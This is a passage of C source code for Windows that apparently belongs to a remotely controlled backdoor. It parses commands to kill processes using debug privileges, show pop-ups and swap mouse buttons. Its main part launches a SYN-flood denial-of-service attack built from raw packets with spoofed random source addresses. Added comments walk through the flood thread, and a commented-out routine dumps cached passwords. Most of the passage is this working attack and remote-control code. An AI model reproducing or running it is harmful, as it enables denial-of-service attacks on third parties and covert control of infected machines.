LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
modpid=atoi(modinfo);HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,modpid);
struct tagMODULEENTRY32 modsnap;modsnap.dwSize=sizeof(tagMODULEENTRY32);
sprintf(workbuff,"\nmods of %d:\nmodule_id\tmodule_name\tmodule_path\n",modpid);
for(Module32First(snapshot,&modsnap);Module32Next(snapshot,&modsnap);){
sprintf(modinfo,"%x\t%s\t%s\n",modsnap.th32ModuleID,modsnap.szModule,modsnap.szExePath);
strcat(workbuff,modinfo);memset(modinfo,0,256);
}
CloseHandle(hToken);*psendlength=strlen(workbuff); return 0;
}
//pskill
if(workflag==0 && strncmp(workbuff,"pskill",6)==0){char procinfo[255]={0};strncpy(procinfo,workbuff+6,256);memset(workbuff,0,65520);
if(!atoi(procinfo)){strcpy(workbuff,"illogical pid,please input a pid\n");*psendlength=strlen(workbuff);return 0;}
HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
HANDLE hproc=OpenProcess(PROCESS_ALL_ACCESS,0,atoi(procinfo));
if(!TerminateProcess(hproc,1)){memset(workbuff,0,65520);strcpy(workbuff,"UNKNOW error:cannot kill proc.usually,this was a result of having privilege not enough.\n");*psendlength=strlen(workbuff);return 0;}
memset(workbuff,0,65520);strcpy(workbuff,"OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)\n");*psendlength=strlen(workbuff);return 0;
}
//funstuff for release
if(workflag==0 && strncmp(workbuff,"popmsg",6)==0){
MessageBox(0,workbuff+6,"Warning",MB_OK|MB_APPLMODAL|MB_TOPMOST);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
if(workflag==0 && strncmp(workbuff,"swapmouse",9)==0){
SwapMouseButton(1);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
if(workflag==0 && strncmp(workbuff,"storemouse",10)==0){
SwapMouseButton(0);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
//synflood
//SYN<tab>ip or 域名<tab>wanted time<tab>fake type(0 for all fake,1 for B class fake)<tab>serioustype<tab>portdest<tab>portsource
//single thread,every 100 packets sleep(1),every 1 min break to consult the global struct
//gethostbyname ret a list to send,every 600000 pauses,about 10 mins gethostbyname flesh one time.
if(workflag==0 && strncmp(workbuff,"SYN",3)==0){
if(dos.dostype){strcpy(workbuff,"DOS already in run.\n");*psendlength=strlen(workbuff);return 0;}
dos.dostype=1;
memset(dos.target,0,200);dos.definemins=1;dos.faketype=0;dos.attackport=80;dos.useport=0;dos.serioustype=100;
//14Q:very weird.if put dos.target at 3rd in definition of dos,sscanf will fail andput 0 to the 3 first byte in dos.target
//reason:[255] or [256],memory overflowed
sscanf(workbuff+4," %s %d %d %d %d %d",dos.target,&dos.definemins,&dos.faketype,&dos.serioustype,&dos.attackport,&dos.useport);
DWORD dwThreadId=0;DWORD WINAPI threadsyn( LPVOID lpParam );
dos.threadhandle=CreateThread(0, 0, threadsyn, 0, 0, &dwThreadId);
strcpy(workbuff,"DOS in run.\n");*psendlength=strlen(workbuff);return 0;
}
//query DOS infomation
if(workflag==0 && strncmp(workbuff,"queryDOS",8)==0){
if(!dos.dostype){strcpy(workbuff,"DOS not in run.\n");*psendlength=strlen(workbuff);return 0;}
if(!dos.seconds){strcpy(workbuff,"DOS timer not initialized.\n");goto lab1;}
sprintf(workbuff,"now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by speed of %d packets/sec;you defined to work for %d minutes.\n",dos.dostype,dos.faketype,dos.target,dos.seconds/60,(dos.pausetime*dos.serioustype)/(dos.seconds),dos.definemins);
lab1:
*psendlength=strlen(workbuff);return 0;
}
//break DOS
if(workflag==0 && strncmp(workbuff,"endDOS",6)==0){TerminateThread(dos.timerhandle,0);
TerminateThread(dos.threadhandle,0);dos.dostype=0;dos.pausetime=0;dos.seconds=0;
//threadtimer may be killed afer its parent thread,but not must?
sprintf(workbuff,"%x terminated\n",dos.threadhandle);
*psendlength=strlen(workbuff);return 0;
}
//tcpstress
//serve as client
//badcmd
memset(workbuff,0,65520);strcpy(workbuff,"bad command or instruction.\n");
*psendlength=strlen(workbuff);return 0;
}
/*
//used in work,passdump
char cachecallback(tagPASSWORD_CACHE_ENTRY * ppce,DWORD paradw){
MoveMemory(buff+16,ppce->abResource,ppce->cbResource);
buff[ppce->cbResource]=0;
//CharToOem(buff,Ob);
//wsprintf(TempBuff,"\n\n\r (USERNAME): %s \n\r (PASSWORD): ",Ob);
MoveMemory(buff+48,ppce->abResource+ppce->cbResource,ppce->cbPassword);
buff[ppce->cbPassword+32]=0;
//CharToOem(szReadBuff,Ob);
//lstrcat(TempBuff,Ob);
return 0;
}
*/
//refer to code of shotgun
//for now we do not handle DNS.
// Worker thread behind the "SYN" command. It builds one raw IPv4+TCP SYN packet
// in synbuff, takes every parameter from the global `dos` structure that the
// command parser filled (target, definemins, faketype, serioustype, attackport,
// useport), and resends the packet in an endless loop. Nothing in this function
// ends the loop except `return 2` below; the run is bounded only by threadtimer,
// which this thread starts itself. lpParam is unused.
// Triage notes for defenders: the host-level behaviour visible here is a
// SOCK_RAW/IPPROTO_RAW socket with IP_HDRINCL enabled, a gethostname/gethostbyname
// lookup of the machine's own addresses, and a second thread (threadtimer) that
// later calls TerminateThread on this one. The `dos` fields are read and written
// by this thread, threadtimer and the command parser with no synchronization.
DWORD WINAPI threadsyn( LPVOID lpParam ){
// Overlays onto synbuff: IPv4 header, TCP header, then the TCP pseudo header.
// The pseudo header is only an input to the TCP checksum; it is never sent.
typedef struct{BYTE h_verlen;BYTE tos;WORD total_len;WORD ident;WORD frag_and_flags;
BYTE ttl;BYTE proto;WORD checksum;DWORD sourceIP;DWORD destIP;
}IP_HEADER;IP_HEADER *ip_header;
typedef struct{WORD th_sport;WORD th_dport;DWORD th_seq;DWORD th_ack;BYTE th_lenres;
BYTE th_flag;WORD th_win;WORD th_sum;WORD th_urp;
}TCP_HEADER;TCP_HEADER *tcp_header;
typedef struct{DWORD saddr;DWORD daddr;
char mbz;char ptcl;WORD tcpl;
}PSD_HEADER;PSD_HEADER *psd_header;
char synbuff[1024]={0};ip_header=(IP_HEADER*)synbuff;
tcp_header=(TCP_HEADER*)(synbuff+sizeof(IP_HEADER));
psd_header=(PSD_HEADER*)(synbuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//begin network
int ret=1;int timeout=2000;
WSADATA wsadata;WSAStartup(MAKEWORD(2,1),&wsadata);
// Raw socket. IP_HDRINCL means the IP header already present in synbuff is
// sent as-is instead of being generated by the stack.
SOCKET sockraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if(!sockraw){closesocket(sockraw);WSACleanup();return 1;}//do not support sockraw
setsockopt(sockraw,IPPROTO_IP,IP_HDRINCL,(char*)&ret,4);
setsockopt(sockraw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,4);
// Fill the fields that do not change. Changed once per pause: tcpseq, srcport.
// Changed per packet: srcip, checksums. Changed every 600000 pauses: destip
// (the "nslookup" mode that was planned for this was never written).
// Only sin_family and (inside the loop) sin_addr of destaddr are ever set;
// sin_port and sin_zero stay uninitialized. With IP_HDRINCL the addresses and
// ports that matter are the ones inside synbuff.
sockaddr_in destaddr;
//12Q:why need a sock_addr and its destip,af_inet but no dest port?????????????????????????
destaddr.sin_family=AF_INET;
// h_verlen: version 4 in the high nibble, header length in 32-bit words in the low nibble.
ip_header->h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(DWORD));
ip_header->total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ip_header->ident=1;ip_header->frag_and_flags=0;ip_header->ttl=255;ip_header->proto=IPPROTO_TCP;
// Ports come from the configuration; the source port is re-randomized per
// pause below when dos.useport is 0.
ip_header->checksum=0;tcp_header->th_dport=htons(dos.attackport);
tcp_header->th_sport=htons(dos.useport);tcp_header->th_ack=0;
// th_lenres: data offset (TCP header length in 32-bit words) in the high nibble.
// th_flag=2 sets only the SYN bit.
tcp_header->th_lenres=(sizeof(TCP_HEADER)/4<<4|0);tcp_header->th_flag=2;
tcp_header->th_win=htons(16384);tcp_header->th_urp=0;psd_header->mbz=0;psd_header->ptcl=IPPROTO_TCP;
psd_header->tcpl=htons(sizeof(TCP_HEADER));
WORD checksum(WORD *buffer,int size);
//now we query our own ip.fixed the error of SYN in selecting net adapters
// Look up this host's own address list and keep the index of its last entry
// (adap); faketype 1 and 2 below use that address. Note that myname is 255
// bytes while gethostname is told it has 256, and that the gethostbyname
// result is dereferenced without a NULL check.
char myname[255]={0};char adap=0;struct hostent* myhost;gethostname(myname,256);myhost=gethostbyname(myname);
for(;myhost->h_addr_list[adap];++adap){}--adap;
//start the timer
//13Q:SetTimer(0,0,1000,timerfunc); without a window func msg circulation,timer callback could not be called.
//so we create a thread to solve this.
DWORD dwThreadId=0;DWORD __stdcall threadtimer(LPVOID lpParam);DWORD myrand(void);
dos.timerhandle=CreateThread(0, 0, threadtimer, 0, 0, &dwThreadId);
// Main loop. One iteration ("pause") is dos.serioustype+1 packets followed by
// Sleep(1); dos.pausetime counts iterations and is what the queryDOS command
// uses for its packets/sec estimate.
while(1){
// On the first iteration and every 600000 after that, re-read the target.
// Only a dotted-quad address is accepted; anything else ends the thread with 2.
if(!(dos.pausetime%600000)){
if(inet_addr(dos.target)!=INADDR_NONE){destaddr.sin_addr.s_addr=inet_addr(dos.target);ip_header->destIP=destaddr.sin_addr.s_addr;psd_header->daddr=ip_header->destIP;}
else{return 2;}//later we write the code of nslookup
}
if(!dos.useport){tcp_header->th_sport=htons((unsigned short)myrand());}
// New initial sequence number for this pause.
tcp_header->th_seq=(((unsigned)myrand()+0x4000)<<16)+(unsigned)myrand()+0x4000;
for(int i=0;i<=dos.serioustype;++i){
// Source address per faketype: 0 = random, 1 = keep the low 16 bits of the
// local address (its first two octets in memory order) and randomize the rest,
// 2 = the local address itself; any other value leaves the previous one in place.
if(dos.faketype==0){ip_header->sourceIP=(((unsigned)myrand()+(unsigned)myrand())<<16)+(unsigned)myrand()+(unsigned)myrand();}
else if(dos.faketype==1){ip_header->sourceIP=((*(int*)(myhost->h_addr_list[adap]))&0x0000ffff)+(((unsigned)myrand()+(unsigned)myrand())<<16);}
else if(dos.faketype==2){ip_header->sourceIP=*(int*)(myhost->h_addr_list[adap]);}
else{}
psd_header->saddr=ip_header->sourceIP;
// Both checksum fields must be zero while they are computed. The TCP checksum
// is taken over the TCP header plus the pseudo header stored right after it.
ip_header->checksum=0;tcp_header->th_sum=0;
tcp_header->th_sum=checksum((WORD*)(synbuff+sizeof(IP_HEADER)),sizeof(TCP_HEADER)+sizeof(PSD_HEADER));
ip_header->checksum=checksum((WORD*)synbuff,sizeof(IP_HEADER)+sizeof(TCP_HEADER));
// Only IP+TCP headers go on the wire; the pseudo header bytes stay in synbuff.
sendto(sockraw,synbuff,sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,(struct sockaddr*)&destaddr,sizeof(destaddr));
}
Sleep(1);dos.pausetime++;
}//end while
// Not reached: the loop above only exits through `return 2` or when another
// thread terminates this one.
return 0x0fffffff;
}
/*
void putdbstring(DWORD a){
HANDLE filefp;
filefp=CreateFile("d:\\syn.txt",GENERIC_WRITE,0,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
SetFilePointer(filefp,0,0,FILE_END);
DWORD byteswritten;WriteFile(filefp,inet_ntoa(*(in_addr*)&a),strlen(inet_ntoa(*(in_addr*)&a)),&byteswritten,0);
WriteFile(filefp,"\t",1,&byteswritten,0);
CloseHandle(filefp);
return;
}*/
// Small pseudo-random helper: returns the low 32 bits of the performance
// counter reduced modulo 0x7fff, i.e. a value in [0, 0x7fff). The modulus
// mirrors the CRT's RAND_MAX (0x7fff). This is a timer read, not a PRNG, so
// calls made close together are likely to return correlated values.
DWORD myrand(void){
    LARGE_INTEGER counter;
    QueryPerformanceCounter(&counter);
    const DWORD low = counter.LowPart;
    return (DWORD)(low % 0x7fffu);
}
//from shotgun,can be improved
// One's-complement Internet checksum (the RFC 1071 algorithm) over `size`
// bytes starting at `buffer`: 16-bit words are summed into a 32-bit
// accumulator, an odd trailing byte is added on its own, the carries are
// folded back into 16 bits and the result is complemented. An empty buffer
// yields 0xffff. `buffer` is advanced locally only; the caller's pointer is
// unaffected.
WORD checksum(WORD *buffer,int size){
    DWORD sum = 0;

    // Whole 16-bit words.
    for (; size > 1; size -= 2) {
        sum += *buffer;
        ++buffer;
    }
    // Leftover byte, if any.
    if (size) {
        sum += *(BYTE *)buffer;
    }
    // Fold the 32-bit sum to 16 bits; the second fold absorbs the carry the
    // first one can produce.
    sum = (sum >> 16) + (sum & 0xffff);
    sum += sum >> 16;
    return (WORD)(~sum);
}
// Companion thread of threadsyn. Ticks dos.seconds once per second and, once
// dos.definemins minutes have elapsed, terminates the flood thread, resets the
// shared `dos` counters and exits this thread. All `dos` fields are accessed
// without any synchronization against the other threads that use them.
// lpParam is unused.
DWORD __stdcall threadtimer(LPVOID lpParam){
    for (;;) {
        Sleep(1000);
        ++dos.seconds;
        if (dos.seconds / 60 < dos.definemins) {
            continue;
        }
        TerminateThread(dos.threadhandle, 0);
        dos.dostype = 0;
        dos.pausetime = 0;
        dos.seconds = 0;
        ExitThread(0);
    }
    // Not reached: the loop only ends through ExitThread.
    return 0x7fffffff;
}
//by hzzh
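// Convert a device-dependent bitmap into a packed DIB (BITMAPINFOHEADER,
// colour table, pixel bits) held in one GlobalAlloc block.
//
// bitmap        - source DDB.
// dwCompression - BI_* compression requested for the DIB. BI_BITFIELDS is
//                 rejected because there is no parameter for the masks.
// hPal          - palette selected while converting; NULL means DEFAULT_PALETTE.
// sizeimage     - out: biSizeImage of the produced DIB; written only on success.
// Returns the DIB handle, which the caller owns and releases with GlobalFree,
// or NULL on failure (BI_BITFIELDS, NULL sizeimage, invalid bitmap, no DC,
// allocation failure, GetDIBits failure).
HANDLE DDBtoDIB( HBITMAP bitmap, DWORD dwCompression, HPALETTE hPal,DWORD * sizeimage)
{
    BITMAP bm;
    BITMAPINFOHEADER bi;
    LPBITMAPINFOHEADER lpbi;
    DWORD dwLen;
    HANDLE hDib = NULL;
    HANDLE handle;
    HANDLE result = NULL;
    HDC hdc;
    int ncolors;

    // The function has no argument for bitfield masks.
    if (dwCompression == BI_BITFIELDS)
        return NULL;
    if (sizeimage == NULL)
        return NULL;

    // If no palette was supplied, use the default palette.
    if (hPal == NULL)
        hPal = (HPALETTE)GetStockObject(DEFAULT_PALETTE);

    // Get the bitmap information. GetObject returns 0 for an invalid handle;
    // bm is then uninitialized and must not be used to build the header.
    if (::GetObject(bitmap, sizeof(bm), (LPSTR)&bm) == 0)
        return NULL;

    // Initialize the BITMAPINFOHEADER.
    bi.biSize = sizeof(BITMAPINFOHEADER);
    bi.biWidth = bm.bmWidth;
    bi.biHeight = bm.bmHeight;
    bi.biPlanes = 1;
    bi.biBitCount = bm.bmPlanes * bm.bmBitsPixel;
    bi.biCompression = dwCompression;
    bi.biSizeImage = 0;
    bi.biXPelsPerMeter = 0;
    bi.biYPelsPerMeter = 0;
    bi.biClrUsed = 0;
    bi.biClrImportant = 0;

    // Colour table size: 2^bpp entries for palettised depths (<= 8 bpp), none
    // for deeper formats. The depth is tested before shifting because
    // `1 << biBitCount` with biBitCount == 32 is undefined behaviour on a
    // 32-bit int; the former "shift, then clamp if > 256" relied on it.
    ncolors = (bi.biBitCount <= 8) ? (1 << bi.biBitCount) : 0;
    dwLen = bi.biSize + ncolors * sizeof(RGBQUAD);

    // A device context is needed to read the bits through.
    hdc = GetDC(NULL);
    if (hdc == NULL)
        return NULL;
    // hPal now holds the previously selected palette; restored in cleanup.
    hPal = SelectPalette(hdc, hPal, FALSE);
    RealizePalette(hdc);

    // Allocate enough memory for the header and the colour table.
    hDib = GlobalAlloc(GMEM_FIXED, dwLen);
    if (!hDib)
        goto cleanup;
    lpbi = (LPBITMAPINFOHEADER)hDib;
    *lpbi = bi;

    // Call GetDIBits with a NULL bits pointer so the driver fills in the
    // colour table and, where it does so, biSizeImage. The return value is
    // deliberately not checked: biSizeImage is recomputed below when it is
    // left at 0, and the second GetDIBits call reports any real failure.
    GetDIBits(hdc, bitmap, 0L, (DWORD)bi.biHeight,
              (LPBYTE)NULL, (LPBITMAPINFO)lpbi, (DWORD)DIB_RGB_COLORS);
    bi = *lpbi;

    // If the driver did not fill in biSizeImage, compute it: each scan line
    // is aligned on a DWORD (32-bit) boundary.
    if (bi.biSizeImage == 0) {
        bi.biSizeImage = ((((bi.biWidth * bi.biBitCount) + 31) & ~31) / 8)
                         * bi.biHeight;
        // With a compression scheme the result may in fact be larger;
        // grow the estimate to allow for that.
        if (dwCompression != BI_RGB)
            bi.biSizeImage = (bi.biSizeImage * 3) / 2;
    }

    // Grow the block so it can also hold the bits. If GlobalReAlloc fails
    // the original block is still valid and is released in cleanup.
    dwLen += bi.biSizeImage;
    handle = GlobalReAlloc(hDib, dwLen, GMEM_MOVEABLE);
    if (handle == NULL)
        goto cleanup;
    hDib = handle;
    lpbi = (LPBITMAPINFOHEADER)hDib;

    // Finally fetch the pixel bits, placed right after header + colour table.
    if (!GetDIBits(hdc, bitmap,
                   0L,                                                    // start scan line
                   (DWORD)bi.biHeight,                                    // number of scan lines
                   (LPBYTE)lpbi + (bi.biSize + ncolors * sizeof(RGBQUAD)), // address for the bits
                   (LPBITMAPINFO)lpbi,                                    // address of bitmapinfo
                   (DWORD)DIB_RGB_COLORS))                                // RGB colour table
        goto cleanup;

    *sizeimage = bi.biSizeImage;
    result = hDib;
    hDib = NULL;  // ownership passes to the caller

cleanup:
    if (hDib != NULL)
        GlobalFree(hDib);
    // Reselect the original palette and release the DC.
    SelectPalette(hdc, hPal, FALSE);
    ReleaseDC(NULL, hdc);
    return result;
}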